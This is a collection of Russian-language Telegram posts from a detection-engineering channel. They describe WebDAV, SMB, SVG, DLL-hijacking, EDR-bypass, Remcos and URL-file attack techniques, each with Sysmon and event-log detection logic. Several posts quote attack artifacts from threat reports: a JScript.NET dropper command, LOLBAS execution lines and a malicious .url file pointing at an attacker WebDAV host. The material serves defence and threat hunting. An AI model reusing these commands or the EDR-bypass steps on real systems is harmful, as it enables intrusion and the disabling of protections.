Всем привет 💻 ✌️
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
🔭 Обнаружение:
🔤 Обнаруживаем запуск
🔤 Отслеживаем создание файлов в директории
🔤 Отслеживаем создание процессов
🔤 при старте службы WebClient происходит проверка ее работы через pipe -
Примеры логов
Обзор от any.run
#detection@detectioneasy
#ttp@detectioneasy
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
net.exe
или net1.exe
с аргументами "\\\\*@SSL\\*"
, "http*"
, "\\\\*@*\\*"
, "*DavWWWRoot*"
AppData\Local\Temp\TfsStore\Tfs_DAV\
- можно проверить наличие записей в $MFT
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie
DAV RPC SERVICE
, можем увидеть в событии Sysmon 18, и bof для проверкиПримеры логов
Обзор от any.run
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет 💻 ✌️
Получают ли Ваши сотрудники файлы SVG?
ЛК представили небольшой обзор злоупотребления SVG.
SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML
SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)
🔭 Обнаружение:
🔤 Создание svg-файлов в директориях пользователя
🔤 Детект на основе ADS NTFS
🔤 Мониторить создание процессов у которых в аргументах содержится
#detection@detectioneasy
#ttp@detectioneasy
Получают ли Ваши сотрудники файлы SVG?
ЛК представили небольшой обзор злоупотребления SVG.
SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML
SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.svg"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"
".*svg\s.*"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
securelist.ru
Использование SVG со встроенным HTML в фишинге
Злоумышленники стали чаще рассылать фишинговые письма с SVG-вложениями, содержащими встроенную HTML-страницу или JavaScript-код.
Всем привет 💻 ✌️
Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB
Для монтирования сетевой папки, часто используют команду
🔭 Обнаружение:
🔤 Мониторим запуск
🔤 Отслеживаем создание процессов, которые начинаются с
🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети
🔤 В журнале
🎯 Для хантинга можем проверить:
🔤 ветку реестра
#ttp@detectioneasy
Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB
Для монтирования сетевой папки, часто используют команду
net use
или в попытке получить хеш пользователя атакуют с помощью ntlm leak
net.exe
или net1.exe
с аргументами use
\\
или буквы тома, которая не используется, например процессы запускались с томов F:
и D:
, а потом notmalware.exe
с тома Q:
Microsoft-Windows-SMBClient/Connectivity
можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям🎯 Для хантинга можем проверить:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\
на наличие параметров, начинающихся с ##
(экранирование \\
) или https
, http
#detection@detectioneasy#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Detection is easy
Всем привет 💻✌️
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
🔭 Обнаружение:
🔤 Обнаруживаем запуск net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*"
🔤…
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
🔭 Обнаружение:
🔤 Обнаруживаем запуск net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*"
🔤…
Всем привет 💻 ✌️
Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.
Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:
🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution
🔭 Обнаружение:
🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса
🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (
🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей
🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)
Скорее всего будет очень шумно...
#detection@detectioneasy
#ttp@detectioneasy
Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.
Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:
\w:\\\\users\\.*\\.*\.dll$
). Можно объединить с предыдущимc:\windows\system32 c:\windows\syswow64 c:\windows\winsxs
Скорее всего будет очень шумно...
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
rt-solar.ru
Бэкдор VipNet: Жуи и Диндин передают привет из 2021 года
Всем привет 💻 ✌️
Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.
Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.
Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в
🔭 Обнаружение:
🔤 Обнаруживаем локальные попытки установки edr/av
🔤 Обнаруживаем попытки использования пакетов из
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера
События при нормальной установке пакета
События при удалении пакета
Событие при обновлении конфигурации
События при завершении установки с ошибкой
Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec
Дополнительно информацию об установленных пакетах можно посмотреть в реестре -
#detection@detectioneasy
#ttp@detectioneasy
Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.
Как это работает
Важные нюансы:
%WINDIR%\Installer
msiexec /i
или восстановления msiexec /fa
%WINDIR%\Installer
, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
MsiInstaller
События при нормальной установке пакета
1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)
События при удалении пакета
11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию)
Событие при обновлении конфигурации
11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета
События при завершении установки с ошибкой
1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)
Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec
Дополнительно информацию об установленных пакетах можно посмотреть в реестре -
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\
<SID>\Products\
<GUID>\InstallProperties
. В этом разделе реестра есть интересный ключ - InstallSource
по которому можно похантить аномалии в установке EDR и т.п.#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Aon
Bring Your Own Installer: Bypassing EDR Through Agent Version Change Interruption
Bring Your Own Installer is a technique which can be used by threat actors to bypass EDR protection on a host through timed termination of the agent update process when inadequately configured.
Всем привет 💻 ✌️
Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it
#detection@detectioneasy
Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
xakep.ru
Уроки форензики. Создаем профиль Volatility для анализа инцидентов в Linux
Инструмент Volatility давно стал стандартом в цифровой криминалистике, но его эффективность напрямую зависит от корректного профиля операционной системы, который выступает «переводчиком» между сырыми данными памяти и понятной человеку информацией. В этой…
Всем привет 💻 ✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит
Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает😄 )
Плохие парни нажимают пару раз shift и получают права system👤 на серваке
🔭 Что же нам делать?
🔤 отслеживаем копирование системных файлов
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения
#detection@detectioneasy
#ttp@detectioneasy
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит
sethc.exe
(utilman.exe
) на cmd.exe, и создаст нового пользователя?Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает
Плохие парни нажимают пару раз shift и получают права system
sethc.exe,
utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe
winlogon.exe
и пользователя system
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет 💻 ✌️
Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память.😈
Что происходит❓
Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).
При открытии срабатывает цепочка:
🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через
Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc
🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell
🔤 Добавление исключений в defender (в AV)
Может получиться интересный хант
#detection@detectioneasy
#ttp@detectioneasy
Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память.
Что происходит
Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).
При открытии срабатывает цепочка:
HKCU:\…\CurrentVersion\Run
, загрузки hta, ps1 и decoy-файла в C:\Users\Public
, добавление директории C:\Users\Public
в исключения Windows Defender (Add-MpPreference -ExclusionPath
). В закреп добавлялась powershell-команда для запуска hta_)VirtualAlloc
, копирует шеллкод и запускает его через CallWindowProcW
, запускается Remcos RATPowershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc
HKLM\...\Run
и HKCU\...\Run
VirtualAlloc
, CallWindowProcW
Может получиться интересный хант
Мы можем собрать и группировать исключения AV с хостов.
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_)
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Qualys
Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos RAT | Qualys
Cybercriminals are progressively turning PowerShell to launch stealthy attacks that evade traditional antivirus and endpoint defenses. By running code directly in memory, these threats leave minimal…
Интересный доклад на phd о работе планировщика задач и способах сокрытия задач
#detection@detectioneasy
#ttp@detectioneasy
#detection@detectioneasy
#ttp@detectioneasy
phdays.com
Positive Hack Days
Международный фестиваль по кибербезопасности для всех, кто хочет погрузиться в мир кибербеза и круто провести время
Detection is easy
Интересный доклад на phd о работе планировщика задач и способах сокрытия задач #detection@detectioneasy #ttp@detectioneasy
Всем привет 💻 ✌️
Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)
Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source
Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠
🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC
#detection@detectioneasy
#ttp@detectioneasy
Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)
Offense/Defense
Больше всего отклинулось внедрение ml/llm в разные области soc/cert
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
phdays.com
Positive Hack Days
Международный фестиваль по кибербезопасности для всех, кто хочет погрузиться в мир кибербеза и круто провести время
Forwarded from Ever Secure (Aleksey Fedulaev)
Друзья, это свершилось! 😱✨
Честно? Мы сами до конца не верили, что этот день настанет... но она — в печати!
Да-да, наша книга теперь существует в реальном, бумажном формате 📖🔥
Уже завтра мы забираем первую партию, и поверьте, она выглядит круче, чем мы ожидали!
А совсем скоро вы тоже сможете её заказать — предзаказ уже на подходе 👀
Следите за новостями, будет кое-что интересное… Может быть, даже небольшой сюрприз для первых заказов?🤔
👀 @ever_secure
Честно? Мы сами до конца не верили, что этот день настанет... но она — в печати!
Да-да, наша книга теперь существует в реальном, бумажном формате 📖🔥
Уже завтра мы забираем первую партию, и поверьте, она выглядит круче, чем мы ожидали!
А совсем скоро вы тоже сможете её заказать — предзаказ уже на подходе 👀
Следите за новостями, будет кое-что интересное… Может быть, даже небольшой сюрприз для первых заказов?🤔
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет 💻 ✌️
В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.
Давайте рассмотрим одну из них
🔤 Атака начинается с фишинга, пользователям присылают ссылку при переходе по которой загружается zip-архив с lnk и ini-файлом. INI по факту является архивом, в котором exe, dll и decoy-pdf. EXE - это легитимный бинарь с подписью, но уязвимый к загрузке dll
🔤 Выполняется команда LNK, которая ищет архив в каталоге пользователя
🔤 Далее проверяется наличие легитимного файла из вложенного архива, он запускается и загружает в память вредоносную библиотеку (С# Loader), для запуска файла используется команда
🔤 Если файла из шага 2 нет, то проверяется наличие
🔤 Для запуска компиляции JScript.NET используется jsc.exe, который в свою очередь запускается с помощью LOLBAS - forfiles. Исполняемый файл сохраняется с именем
Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:
🔤 При обращении к серверу используется следующая строка заголовка
🔤 Создается рабочий каталог
🔤 Для закрепления создается
🔤 Для защиты от песочниц следующего этапа, атакующие проверяют систему, и если он не соответствует критериям, то загружается
🔭 Обнаружение
🔤 по классике, отслеживаем создание LNK-файлов
🔤 основным тригером для нас должны стать команды из LNK. набор триггеров и LOLBAS и .Net, касательно этой кампании можем поискать использование
🔤 создание скриптов в директории автозагрузки
Похантить можно:
🔤 user-agent
🔤 наличие скриптов в директории автозагрузке пользователя
🔤 обращение на
#detection@detectioneasy
#ttp@detectioneasy
В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.
Давайте рассмотрим одну из них
%USERPROFILE%
, создает JScript.NET файл. Он распаковывает zip-архив, замаскированный под расширение INIset /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a
start
с применением обфускации^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit
unzip.exe
(скомпилированный JScript.NET), который распаковывает фальшивый INI-файлif exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7")
%TEMP%\unzip.exe
(C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")
Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:
User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
%APPDATA%\74EJ6RTFKKRS
startapp.bat
в каталоге автозагрузки, который запускает %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe
hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf
forfiles.exe
и start.exe
Похантить можно:
User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
ВПО или LLM? Silent Werewolf использует новые загрузчики в атаках на российские и молдавские организации
Злоумышленники ограничивают возможность получать вредоносную нагрузку. Это делает ВПО менее отслеживаемым, а также усложняет для исследователей изучение самой группировки
Всем привет 💻 ✌️
Давайте сегодня поговорим о теме абстракции, касательно всех команд SOC. Тема не новая, но многие забывают о ней или не осознают ее значимость.
Абстракция - это концепция, с помощью которой детали реализации скрыты от пользователя или автоматизированы для него
Для наглядного примера я взял скриншот из проекта AbstractionMaps.
💙 Детектирование может строиться на:
🔤 Используемых утилитах - эффективно, если корректно внедрен CTI, мы понимаем контекст того, какие группировки интересуются нашей организацией и следим за ними. Названия, метаинформация файлов, User-Agent'ы, сертификаты по умолчанию и т.п.
🔤 Утилиты строятся на использовании протоколов, API/WinAPI - так мы можем их обобщить и писать правила для обнаружения нескольких инструментов одновременно.
🔤 WinAPI под капотом часто использует RPC-интерфейсы и соответствующие методы.
🔤 В зависимости от выполняемых действий, на нижнем уровне могут быть обращения к файловой системе, реестру, сетевым протоколам.
Данный подход позволяет изучить исследуемый объект с нескольких сторон и сделать наши правила более универсальными.
❤️ Красной команде понимание абстракции важно при написании инструментов и повышении стелс-возможностей.
Рассмотрим процесс создания службы. Сколько вариантов вы можете назвать? 2-3 или больше? Например:
🔤 Утилита sc.exe create
🔤 Командлет New-Service
🔤 Invoke-PSExec
...и этот список можно продолжать бесконечно (yet another tool ✌️). А если углубиться ниже, все инструменты в конечном итоге используют одни и те же системные интерфейсы и их методы:
🔤 Вызов RPC, интерфейс UUID
🔤 Named pipe
Можно создать службу и через реестр), и тогда все вышеописанное окажется бесполезным).
Мы рассмотрели способы создания служб, но все созданное должно где-то храниться. В Windows основные конфигурации хранятся в реестре, остальные данные — в других структурах. Для эффективного детектирования нам нужно отслеживать создание ключей реестра, а также другие низкоуровневые события, опираясь на модель абстракции.
P.S. Эффективной практикой будет также отслеживание попыток изменения легитимных служб
#detection@detectioneasy
Давайте сегодня поговорим о теме абстракции, касательно всех команд SOC. Тема не новая, но многие забывают о ней или не осознают ее значимость.
Абстракция - это концепция, с помощью которой детали реализации скрыты от пользователя или автоматизированы для него
Для наглядного примера я взял скриншот из проекта AbstractionMaps.
Данный подход позволяет изучить исследуемый объект с нескольких сторон и сделать наши правила более универсальными.
Рассмотрим процесс создания службы. Сколько вариантов вы можете назвать? 2-3 или больше? Например:
...и этот список можно продолжать бесконечно (yet another tool ✌️). А если углубиться ниже, все инструменты в конечном итоге используют одни и те же системные интерфейсы и их методы:
{367ABB81-9844-35F1-AD32-98F038001003}
\PIPE\svcctl
Можно создать службу и через реестр), и тогда все вышеописанное окажется бесполезным).
Мы рассмотрели способы создания служб, но все созданное должно где-то храниться. В Windows основные конфигурации хранятся в реестре, остальные данные — в других структурах. Для эффективного детектирования нам нужно отслеживать создание ключей реестра, а также другие низкоуровневые события, опираясь на модель абстракции.
P.S. Эффективной практикой будет также отслеживание попыток изменения легитимных служб
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Detection is easy
Всем привет! 💻 ✌️ Сегодня рассмотрим технику fake captcha Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот 🤖 Капча необычная,…
По информации от TI Bi.Zone ClickFix зафиксирован в кампаниях нацеленных на российские организации
Наши читатели были к этому готовы✔️
#detection@detectioneasy
Наши читатели были к этому готовы
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
Подтвердите, что вы не робот: для атак на российские компании стали использовать фейковую CAPTCHA
Около 30 российских компаний были атакованы в мае — начале июня с использованием техники ClickFix, которая заставляет пользователей самостоятельно запускать вредоносные скрипты. Ранее таким атакам подвергались только зарубежные организации
Познакомимся с regseek - это база данных важных ключей реестра с их описанием, насчитывает порядка 139 артефактов.
И зачем нам это❓
🔤 Оценить качество собираемых событий. В репозитории артефакты разделены по доменам, понятно, что некоторые ключи могут быть не связаны напрямую с деятельностью APT и т.п., но помогут обнаружить нарушение политик ИБ
🔤 Обогатить собираемые события (алерты) описанием из репозитория
#detection@detectioneasy
И зачем нам это
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Отчет от CheckPoint, для атаки используется URL-файл - да опять)
Содержимое:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
В целом ничего необычного, только
iediagcmd.exe
выполняет ряд команд:
ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print
В рабочей
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
хакеры размещают вредоносный route.exe
, который и запускается после открытия файлаТакже для атак использовался легитимный файл -
CustomShellHost.exe
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
www.kaspersky.ru
CVE-2025-33053: RCE в WebDAV
Microsoft закрыла уязвимость CVE-2025-33053 в Web Distributed Authoring and Versioning (WebDAV), позволяющую злоумышленникам удаленно запустить произвольный код на компьютере жертвы.
Detection is easy
Всем привет 💻 ✌️ Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. 🔭 Обнаружение: 🔤 Обнаруживаем запуск net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*" 🔤 Отслеживаем…
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CurrentDirectory startswith "\\\\"
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image startswith "\\\\"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM